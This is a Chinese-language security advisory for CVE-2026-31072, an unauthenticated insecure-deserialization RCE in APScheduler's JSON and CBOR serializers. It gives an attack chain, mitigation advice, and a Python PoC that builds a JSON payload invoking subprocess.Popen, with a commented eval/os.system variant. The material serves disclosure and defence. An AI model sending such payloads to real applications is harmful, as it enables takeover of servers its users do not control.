CVE-2026-31072 CVSS 9.8 严重

CVE-2026-31072 APScheduler不安全反序列化RCE漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31072

漏洞类型

远程代码执行 (RCE)

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

APScheduler

漏洞概述

APScheduler 的 JSONSerializer 和 CBORSerializer 组件存在不安全反序列化漏洞。攻击者无需认证即可通过发送特制的 JSON 或 CBOR 载荷，利用 `unmarshal_object` 函数动态导入模块并调用 `__setstate__`，从而在目标系统上执行任意代码，导致服务器被完全控制。

技术细节

该漏洞产生于 APScheduler 处理序列化数据时的逻辑缺陷。其 `unmarshal_object` 函数允许通过 JSON 或 CBOR 数据指定任意 Python 类路径，并动态导入该模块进行实例化。在对象重建过程中，系统会自动调用目标类的 `__setstate__` 方法。由于未对可反序列化的类进行安全限制，攻击者可构造特制载荷，指定能够执行系统命令的类（如 `os.system` 的封装类或 `subprocess` 相关类），或在 `__setstate__` 中嵌入恶意逻辑。当应用解析此载荷时，将直接加载恶意类并执行代码，导致服务器被完全接管。

攻击链分析

STEP 1

侦察

攻击者识别出目标应用程序使用了存在漏洞的 APScheduler 版本，并启用了 JSONSerializer 或 CBORSerializer。

STEP 2

武器化

攻击者构造恶意的 JSON 或 CBOR 载荷，其中包含指向危险类（如 subprocess.Popen）的类路径及用于执行命令的参数。

STEP 3

投递

攻击者通过网络向目标应用程序的接口发送特制的序列化数据载荷。

STEP 4

利用

应用程序的 APScheduler 组件接收数据并调用 unmarshal_object 函数进行反序列化，动态导入恶意模块并实例化对象。

STEP 5

执行

在对象实例化或状态恢复（__setstate__）过程中，触发恶意代码执行，攻击者获得服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import json

# PoC for CVE-2026-31072: APScheduler Insecure Deserialization RCE
# This script generates a malicious JSON payload designed to exploit
# the unmarshal_object vulnerability in APScheduler.

def generate_malicious_payload():
    # The payload structure targets the unmarshal_object function.
    # It attempts to instantiate a class that executes a command.
    # Note: The specific class used depends on the Python environment available on the target.
    
    # Example: Targeting a class that runs a shell command via __setstate__
    # This structure mimics the behavior expected by the vulnerable serializer.
    payload = {
        "__class__": "subprocess.Popen",
        "__args__": [["touch", "/tmp/pwned"]]
    }

    # Alternatively, targeting os.system if the environment allows direct execution in __init__
    # payload = {
    #     "__class__": "builtins.eval",
    #     "__args__": ["__import__('os').system('id')"]
    # }

    return json.dumps(payload)

if __name__ == "__main__":
    print("[*] Generating malicious JSON payload for CVE-2026-31072...")
    payload = generate_malicious_payload()
    print(f"Payload: {payload}")
    print("[*] Send this payload to the vulnerable application endpoint.")

影响范围

APScheduler 所有版本 (包括 3.10.x)

APScheduler 4.0.0a5

防御指南

临时缓解措施

如果无法立即升级，请停止使用 JSON 和 CBOR 序列化程序。建议仅在纯数据传输场景下使用标准 JSON 库，并避免反序列化不受信任的数据。同时，应通过网络防火墙限制对任务调度接口的访问，仅允许可信来源调用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表